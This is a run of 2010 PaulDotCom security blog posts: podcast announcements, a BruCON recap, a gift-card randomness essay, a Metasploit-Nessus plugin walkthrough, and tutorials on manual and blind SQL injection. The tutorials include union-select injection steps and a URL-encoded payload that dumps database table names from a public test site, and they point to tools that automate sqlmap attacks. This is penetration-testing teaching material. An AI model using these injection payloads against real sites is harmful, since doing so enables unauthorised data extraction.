Continuing the trend of overloading Skype, we have a show that crams as much InfoSec into one podcast as your fragile ears and eyes can handle! We'll have on:

- Scott Hazel (phat32) to discuss Social Engineering and his strategies for his recent CTF wins at past DefCons

- Jeff "The Dark Tangent" Moss, founder of both Black Hat and DefCon

- Bill Brenner of CSO Online, *in studio* to smoke some excellent cigars and rap with the PDC crew

All of the shenanigans take place tomorrow night on Episode 213 of PaulDotCom Security Weekly.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and enjoy the show live!

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, and John Strand.

Bottom line: Brucon was awesome! And now my "trademark" post on what I learned (with lots of pictures):

• Belgian beer is the best in the world, especially when enjoyed in its country of origin with friends





• Samy really is my hero, he can meet your girlfriend, and gave an awesome presentation. He also gave me a really good idea to extend www.securityfail.com to look for that...





• Wicked Clown gave a great presentation an showed how you can get around execution restrictions using RDP and the Terminal Services Client. Neat stuff and shows you don't need to think in binary and code in assembly to find vulnerabilities.





• Nessus training goes much smooth when the VMware images are distributed on USB sticks.





• The "winner" of powerpoint karoke is really chosen by which slide deck you get at random, I just happened to get "Honey, I'd like to have a threesome". Fortunately it was not captured on video but I am thinking of asking Frank for the slides and submitting it to other conferences.





• Duvel not only tastes better in Belgium, but also has the same alcohol content (about 9%) and earns the nickname "Devil"





• I'm thinking about "pimping" my presentations, "Foshizzle" (I also think I want to dress like a pimp for Halloween)





• Nickerson gave a talk about f****ing s**t up. He covered such topics as hacking into manufacturer plants to build full scale robitoc donasaur references, hacking into medical equipment for population control, and other such horrible disasters, This sounds shocking, but the point I took away from this was you can tell your customers "this could" happen, and they will carry on with a risk decision that will most likely save them the most money, which means they will do nothing. We need to work with out customers to fully explain the reprocussions of vulnerabilities, becase just saying, "look, I got shell!" doesn't mean anything to people other than us.





• Joe McCray really is the black SQL ninja samurai, like for real. Some very cool SQL injection stuff that he showed, different ways to encode. I also picked up a few tricks from Ryan Dewhurts on using "null" table names when injecting SQL.





• For an energy drink, Club Mate tastes okay, I think I just need to drink more of it.





• You can sum up the economics of software security in the words of WuTang Clan: "Cash Rules Everything Around Me".





• Tom from the disaster protocol podcast means it when he says he's going to punch you in the face.

Episode 212 Show Notes

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

I was blind, but now I see!

Last week I released a tool that extracts data from a database using Blind SQL Injection techniques. The tool asks a series of TRUE of FALSE questions. Many people are under the impression that this TRUE or FALSE questioning technique is the only way to extract data from a site that has a "Blind" SQL injection vulnerability. As you have probably guessed, that is not correct. You can extract and visually see all the data in a database when exploiting most Blind SQL Injection vulnerabilities.

It is very rare to find an application that queries the database and doesn't display any of the returned data to the user. Im sure they exist, but for the most part when applications execute queries based upon some type of user input, at least some small portion of that data is returned to the user. If only one field is returned to the user you can use that field to display all of the records in the entire database with manual sql injection. Manual SQL data extraction is something every good pen-tester should know how to do. Eventually your automated tools will fail and when they do, knowing how to manually extract the data will come in handy. Here are some basic steps that I use to manually extract data with SQL injection:

1) Determine if your injection point is a numeric field or a string field.
First, I usually check for numeric fields by trying to do some simple math at the injection point. For example, I'll submit "recordid=3+1" and see if it returns record number 4. If it returns record 4 then I have a numeric injection point. If you are injecting on the URL the plus sign (+) is a url encoded space. On the url you would submit "recordid=3%2b1". %2b is an encoded plus sign.
If math doesn't work I try injecting a single quote (') to see if you have a string injection point. For example, I will try to injection ' or 'true'='true to see if I get a large number of records or a different record back. If the record set returned changes, then I probably have an injection.

2) Eliminate all the data being returned by the original select statement.
This is easy. Injection "AND FALSE" eliminates all the result to the original select statement. So and 1=0 on a numeric field or ' and 'true'='false on a string field does the job.

3) Determine how many fields were returned by the original select statement with a union.
When you inject a UNION SELECT your second select statement must request the same number of columns as the FIRST select statement (the one your injecting into). To determine how many fields are in the first select, you start with one field and you keep increasing the number of fields until you get a result. So inject and 1=0 union select 1. If a "1" is returned to the screen somewhere you have a match. If no,t try two fields and 1=0 union select 1,2. If a 1 or a 2 are returned to the screen you have a match if not try three fields, and so one until you have a match.

4) Now start using the fields that are displayed to extract data.
Each of the number displayed on the screen can be replaced with a SUBSELECT (a select statement in parenthesis) to retrieve what ever data you want. The one limitation is that each item returned needs to be a single text value. MySQL functions like "CONCAT()" which combines multiple strings into a single string and "GROUP_CONCAT()" which combines the ROWS in the database into a single text string can be used to extract entire databases into a single text blob. Various SQL Injection cheat sheets are available that show you how to examine the schema to figure out your table structure and understand how to extract the data.

The best way to learn is to practice. DVWA (Damb Vulnerable Web App) 1.7 is out and they have added a "Blind SQL Injection" portion to their wonderful tool. Here is a demo of using these techniques on their Blinds SQL Injection Vulnerability.

Manual SQL Injection demonstration using DVWA from PaulDotCom on Vimeo.

.

Join me for SANS 504 Hacker Techniques, Exploits and Incident handling in San Antonio November 13th! REGISTER TODAY http://www.sans.org/san-antonio-2010/description.php?cid=799

Zate Berg has contributed this week the a plug-in for controlling Nessus from inside msfconsole. I do have to say he has put a lot of work in a very small amount of time learning Ruby and coding this plugin in only a few weeks. The plug-in is now part of the Development Brach of the project and several patches have been summited by him and progress has been quick.

First thing is to get the new plugin is to “svn up” to the latest development version of the project and do make sure that your Nessus server is up and running. One note do you must have already created Policies in you server and have them available to the account you will use to login to the Nessus Server.

Lets load the plugin and get and output of the commands available:

msf > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help 
[+] Nessus Help
[+] type nessus_help <command> for help with specific commands
Command                    Help Text
-------                    ---------
Generic Commands           
-----------------          -----------------
nessus_connect             Connect to a nessus server
nessus_logout              Logout from the nessus server
nessus_help                Listing of available nessus commands
nessus_server_status       Check the status of your Nessus Server
nessus_admin               Checks if user is an admin
nessus_server_feed         Nessus Feed Type
nessus_find_targets        Try to find vulnerable targets from a report
                           
Reports Commands           
-----------------          -----------------
nessus_report_list         List all Nessus reports
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_hosts        Get list of hosts from a report
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_host_detail  Detail from a report item on a host
                           
Scan Commands              
-----------------          -----------------
nessus_scan_new            Create new Nessus Scan
nessus_scan_status         List all currently running Nessus scans
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
                           
Plugin Commands            
-----------------          -----------------
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_plugin_family       List plugins in a family
nessus_plugin_details      List details of a particular plugin
                           
User Commands              
-----------------          -----------------
nessus_user_list           Show Nessus Users
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_passwd         Change Nessus Users Password
                           
Policy Commands            
-----------------          -----------------
nessus_policy_list         List all polciies
nessus_policy_del          Delete a policy

As it can be seen there are a lot of commands to choose from. According to Zate Berg not all commands are implemented and that he has 80% of them done at the time of this blog post is written. With the development version we can start playing and familiarizing ourselves with the plugin as it advances. Lets connect to our Nessus Server, this server can be local or remote:

msf > nessus_connect carlos:$ecret4blog@192.168.1.231 ok
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
msf >

Once we have connected to our server we can check what policies have we defined and use those for performing a scan:

msf > nessus_policy_list 
[+] Nessus Policy List
ID  Name     Owner   visability
--  ----     -----   ----------
-1  General  carlos  shared
msf > nessus_scan_new -h
[*] Usage: 
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -1 homelab 192.168.1.1/24
[*] Creating scan from policy number -1, called "homelab" and scanning 192.168.1.1/24
[*] Scan started.  uid is 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196

The scan started and we get an uid of 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196 this ID is important because we will use this ID in next commands so we can check the status of the scan:

msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  79             254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  239            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  242            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  249            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[*] No Scans Running.
[*] You can:
[*]         List of completed scans:     	nessus_report_list
[*]         Create a scan:           		nessus_scan_new <policy id> <scan name> <target(s)>
msf > n

As it can be seen in the example above we can see the host count as they are scanned once finished we will see that the scan disappears from the status info. Lets check the results of our scan:

msf > nessus_report_list 
[+] Nessus Report List
ID                                                    Name     Status     Date
--                                                    ----     ------     ----
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  completed  15:52 Sep 26 2010
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_hosts
[*] Usage: 
[*]        nessus_report_hosts <report id>
[*]        use nessus_report_list to list all available reports
msf > nessus_report_hosts 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[+] Report Info
Hostname       Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------       --------  -----  -----  -----  -----  ----------------  --------------
192.168.1.1    24        4      23     1      0      38873             38873
192.168.1.100  5         0      5      0      0      38873             38873
192.168.1.109  3         0      3      0      0      38873             38873
192.168.1.171  214       15     61     20     133    35764             38873
192.168.1.229  12        1      11     1      0      38096             38873
192.168.1.231  38        6      27     5      6      38873             38873
192.168.1.234  20        4      20     0      0      38873             38873
192.168.1.236  28        5      26     2      0      38096             38873
192.168.1.237  5         0      5      0      0      38873             38873
192.168.1.240  159       15     62     12     85     38873             38873
192.168.1.241  32        5      30     1      1      38096             38873
192.168.1.242  31        5      29     1      1      19437             38873
192.168.1.243  6         0      6      0      0      38873             38873
192.168.1.244  23        6      23     0      0      38873             38873
192.168.1.245  17        3      16     1      0      38873             38873
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>

As it can be seen from the output above I can see the number of plugins that returned positive and their count. We can now connect to our database and import the data so we can use other modules and plugins. I will connect to a SQLite DB <NOT RECOMMENDED FON PRODUCTION> I know it is buggy and not supported anymore but I will use it for simplicity for my example. Once the DB is created I import the report and parse it in to my MSF DB:

msf > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf > nessus_report_get 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[*] importing 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
msf > 

Know that it said it finished let’s check with db_hosts the imported records:

msf > db_hosts 
Hosts
=====
address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
192.168.1.1                                    2010-09-26 20:23:07 UTC        00:0D:B9:1D:8E:B4  ASAFW.local                                                              alive  2010-09-26 20:23:07 UTC  6     22     default
192.168.1.100                                  2010-09-26 20:23:06 UTC        00:26:BB:15:05:D8  loki.local                                                                 alive  2010-09-26 20:23:06 UTC  1     5      default
192.168.1.109                                  2010-09-26 20:23:06 UTC        7C:6D:62:E0:5E:CD  darkoperator-iPad.local                                                   alive  2010-09-26 20:23:06 UTC  0     3      default
192.168.1.171                                  2010-09-26 20:22:11 UTC        00:0C:29:A7:BD:AF                                                                             alive  2010-09-26 20:22:11 UTC  15    204    default
192.168.1.229                                  2010-09-26 20:22:09 UTC        00:23:32:34:1D:B7  AppleTV.local                                                              alive  2010-09-26 20:22:09 UTC  2     12     default
192.168.1.231                                  2010-09-26 20:22:03 UTC        00:0C:29:EE:13:87  ubuntu.local                                                               alive  2010-09-26 20:22:03 UTC  5     33     default
192.168.1.234                                  2010-09-26 20:22:03 UTC        00:1E:EC:A5:B9:86  pwnage01.local                                                             alive  2010-09-26 20:22:03 UTC  12    20     default
192.168.1.236                                  2010-09-26 20:22:01 UTC        00:0C:29:A2:19:2A  freenas.local                                                              alive  2010-09-26 20:22:01 UTC  6     28     default
192.168.1.237                                  2010-09-26 20:22:01 UTC        00:0C:29:F1:5D:96  winxp01.local                                                              alive  2010-09-26 20:22:01 UTC  0     5      default
192.168.1.240                                  2010-09-26 20:20:49 UTC        00:0C:29:F8:8F:82  win2k801.local                                                             alive  2010-09-26 20:20:49 UTC  15    154    default
192.168.1.241                                  2010-09-26 20:20:48 UTC        00:16:CB:9F:9E:11  infidel02.local                                                            alive  2010-09-26 20:20:48 UTC  7     31     default
192.168.1.242                                  2010-09-26 20:20:44 UTC        00:17:F2:99:D7:CF  infidel03.local                                                            alive  2010-09-26 20:20:44 UTC  7     30     default
192.168.1.243                                  2010-09-26 20:20:44 UTC        00:0C:29:25:89:66  win701.local                                                               alive  2010-09-26 20:20:44 UTC  1     6      default
192.168.1.244                                  2010-09-26 20:20:43 UTC        00:24:8C:5B:FC:B8  Infidel01.local                                                            alive  2010-09-26 20:20:43 UTC  12    23     default
192.168.1.245                                  2010-09-26 20:20:41 UTC        00:17:E0:3E:73:AA  TSGAP01.local                                                              alive  2010-09-26 20:20:41 UTC  3     15     default

As you can see you can do a lot with the plugin and it will get better with time because Zate is now addicted like many of us to coding for the framework. Do follow him on Twitter for updates @zate.

Episode 212 Show Notes

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

Each week, we have Information Security experts, hackers, and well, just plain crazy party folks just itching to interact with you and this week is no different! Come listen live and experience the awesomesauce that is Travis Goodspeed live on Episode 212 of PaulDotCom Security Weekly.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and help us deploy Party Mode!

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, and John Strand.

My third python web testing script in this series is a blind SQL injection script. It is used to automatically extract data from a MYSQL database using blind SQL injection techniques. There are already many tools out there that do this, but this one is a little different. It uses a different technique to extract the data.

Most Blind SQL injection tools will either Brute Force or repeatedly cut the alphabet in half to formulate it's next guess. For example, if the database name was "CAT" a Brute Force tool would ask the following questions..

Is the first letter of my database name = "A" (answer:NO)
Is the first letter of my database name = "B" (answer:NO)
Is the first letter of my database name = "C" (answer:YES)
Is the second letter of my database name = "A" (answer:YES)
Is the third letter of my database name = "A" (answer:NO)
And so on.

More efficient tools play 50 questions and make their guesses like this:

Is the first letter of my database name < "M" (answer: YES)
Is the first letter of my database name < "G" (answer YES)
Is the first letter of my database name < "D" (answer YES)
Is the first letter of my database name < "B" (answer NO)
Is the first letter of my database name = "B" (answer NO, OK it must be C)
Then it moves on to the second letter, and so on, and so one.

This tool uses a different technique. It uses a per letter frequency table to predict the next letter. For example, if you have a Q there is a HIGH probability that the next letter is a U. The technique is discussed in an excellent paper titled "Technique of quick exploitation of 2blind SQL Injection" which can be downloaded here http://www.exploit-db.com/papers/13696/ The paper is by Dmitry Evteev (Positive Technologies), Vladimir (D0znp) and Voronzov (ONSec). The paper is really good and so far, the results are too! Using this technique I've found I'm able to extract data with much fewer request than with brute force techniques. Improved performance and stealth!

I took their technique and implemented in a python script. To use my script you give the script a vulnerable URL, and you put your SQL query in the URL with carets as markers at the point on injection.

For example:

mark.baggett$ $ python sqlinjector.py "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"

a

ac

acu

acua

acuar

acuart

end of word found

Found target acuart in 79 guesses.

Let's compare that to a brute force tool.

mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url http://testphp.vulnweb.com/listproducts.php?cat=1
// Blind SQL injection brute force.
// aramosf@514.es / http://www.514.es

trying: acuart#### results:
database() = acuart
total hits: 126

That is pretty nice! We went from 126 guesses to only 79. That is AWESOME when you consider that to determine you've reached the end of the line you have to go through the entire character set and make 38 guesses. Executing a MySQL function call like database() is an nice easy demo, but the tool is capable of more. You can put any SQL statement you want in there that returns a single text string. For example, you can extract all the tables from the schema with something like this:

mark.baggett$ python sqlinjector.py "http://testphp.vulnweb.com/listproducts.php?cat=1^%28select%20concat%28%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema!=0x6d7973716c%20%20and%20table_schema!=0x696e666f726d6174696f6e5f736368656d61%29%29%29^#"
a
ar
art
arti
artis
artist
artists
artists,
artists,c
artists,ca
artists,car
artists,cart
artists,carts
artists,carts,
artists,carts,c
artists,carts,ca
artists,carts,cat
etc...

There are some significant limitations to this release of the tool. The character tables are not complete. Unfortunately, the paper posted by Dmitry and company didn't include the complete character frequency tables. It is missing a few characters such as M, N, punctuation and numeric values. In this script I just used a default frequency table for those characters which I am sure makes it less efficient. If you know where I can find the correct tables for those characters please drop me a line.

You can download the tool here: sqlinjector.py

Thanks to the Acunetix guys at www.acunetix.com for their awesome test site and their tool.

Mark Baggett

Join me for SANS 504 Hacker Techniques, Exploits and Incident handling in San Antonio November 13th! REGISTER TODAY http://www.sans.org/san-antonio-2010/description.php?cid=799

Episode 211 Show Notes

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

Episode 211 Show Notes

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

A topic I have been following lately is gift cards and the profound lack of randomness in their numbers.

This whole "love affair" started when I was teaching at RSA a year or so ago and they handed out gift cards to all of the attendees of their training for lunch. They were actual pre-paid AMX cards for a local mall, the exact same cards you would give out to friends and family because you are too lazy to buy them a proper gift.

When we got back to class I asked everyone if they would be willing to partake in an experiment. I had all of them write their numbers down and bring their cards up to the front of class and lay them all out. What we found was a bit odd. The numbers were all very close to each other. What happens is a company (or a person) buys a batch of these then hands them out. There were over 200+ people there for the training and it was pretty clear all of these cards were from the same batch.

Just a few days ago I was in a blue big-box department store, and while waiting in line I noticed the huge variety of different gift cards for iTunes, Chili’s, Amazon and just plain Visa gift cards for the lazy. I decided on a whim to purchase three cards with numbers on the outside of the package as close to each other as possible.

So there I am sitting on the floor of a department store with about 50 cards spread out around me. Oddly enough no one stopped me or asked me what I was doing. Apparently, a strange person in a "There no place like 127.0.0.1" shirt, sitting on the floor while sifting through gift cards is not all that strange a sight. Because God knows, there is no better way to be "edgy" then wearing shits that will only be understood by .1% of the population.

When it came time for my purchase there were a few surprises. First, I had to put at least $20 on the card. That was cool. Second, I had to purchase them with cash. This was very interesting. I cannot help but wonder if the organization in question here knew the security of this whole system sucked and wanted their money upfront. It also may be a way to stop people from converting stolen credit cards to gift cards easily.

As soon as I got home I opened them and with very little-to-no-shock, the numbers were damn close to each other. One (small) saving grace was the three number, CVC or CCV numbers, were all different. I did some plugging around and I found that these numbers are not mandatory for online merchants. Further, I went searching around online and I found a number of vendors who do not require this number.

Finally, the cards are a bit cheap looking. It would be no great feat for a bad guy to clone and create additional cards with numbers that will be used. He would just have to wait for the Christmas rush and go shopping.

I talked about this in the SANS 560 vLive class I was teaching and Leonard Isham (one of my students) sent me a fascinating pair of articles:

Man Scentenced for Gift Cards Cloning

iTunes and Ebay Money Laundering scan

Turns out there has been a problem with this for some time.

Let’s step back from this for just a second and look at the larger issue. Randomness is key to security. Below are just a few examples where numbers that are non-random have bit us in the ass.

IP IDs

Source Ports for DNS

MiFi Card Passwords

Session Tokens

Initial Vector Values in WEP

The point we should take from all of this is that anytime there is nonrandom numbers it is a possible point of attack. There are examples to the contrary, though. For example, WPA uses sequential IV's to reduce the chance of collision due to the birthday paradox. However, situations where someone thought it through are rare. Most of the time it is simply due to the fact that someone is being lazy. Turns out, chaos is your friend when it comes to securing your protocols and numbering schemes!

The more I think about this, the more it makes me mad. Why do vendors do this? I guess it is because they never thought it was a problem. People keep buying cards and if the money disappears, who cares? The unlucky consumer has little or no recourse. Can you imagine a scenario where someone goes and complains that the money that was supposed to be on their card is gone?

"Right sir! I will put the money back on your card. How much was it you say? $100? Righty-right!"

Unlikely.

Maybe this year I will pass on the gift card rush. Maybe, this year I will give thoughtful gifts that reflect how important each person on my gift list is to me. Maybe this year I will not buy gift cards.

Doubt it.

-strandjs

John Strand will be teaching SANS Hacker Techniques and Incident Response in San Francisco November 5-11.

Tomorrow night at 7:30 PM, we'll have Vincent Liu of Hacking Exposed: Wireless fame on Episode 211 of PaulDotCom Security Weekly to give us some Wi-Fi Fu and a preview of his upcoming Hacking Exposed: Web Applications book.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and most of all, come talk to Vinnie!

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, and John Strand.

Episode 210 Show Notes

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

p0wnpr0xy.py is a simply python script that acts as a http/https proxy and launches commands such as sqlmap against targets that are in-scope. It relies on httpservers.py from gnucitizen to do the heavy lifting. You can download his module from here and save it to the same directory as p0wnpr0xy.

When you launch p0wnpr0xy you supply it with two arguments:
1) Part of the domain name for the in-scope hosts
2) The full command line for the tool you want to use against the target URL

p0wnpr0xy will start a proxy listener on port 8080. You modify your browsers proxy settings to browse through the proxy. The proxy will collect in-scope URLs and the cookies associated with each URL. It then walks you through all of the URL that have been collected and gives you the option to launch the specified command on each URL. If you choose to attack the URL it will launch the command specified on the command line replacing the string "{url}" with the URL collected and the string "{cookies}" with cookies it has collected.

Pretty simple, but it can make repetitive tasks easier. Here is an demonstration of how you can use p0wnpr0xy along with sqlmap.

Using p0wnpr0xy from PaulDotCom on Vimeo

Download p0wnpr0xy HERE!

Don't forget to download GNUCitizens httpservers module here.

Tomorrow night, we'll test Skype's breaking point by having FIVE guests live on Episode 210 of PaulDotCom Security Weekly (PSW). Any more guests, and we'd have to refer to the show as PSWCon!

Joining us will be Thomas Mackenzie, Duncan Alderson, and Danny Chrastil to speak about their UpSploit project, a new, free web application Advisory Management Solution & public advisory database.

We'll also have Christian Papathanasiou and Nicholas Percoco of Trustwave's SpiderLabs to speak about their recent DefCon presentation on Android Rootkits.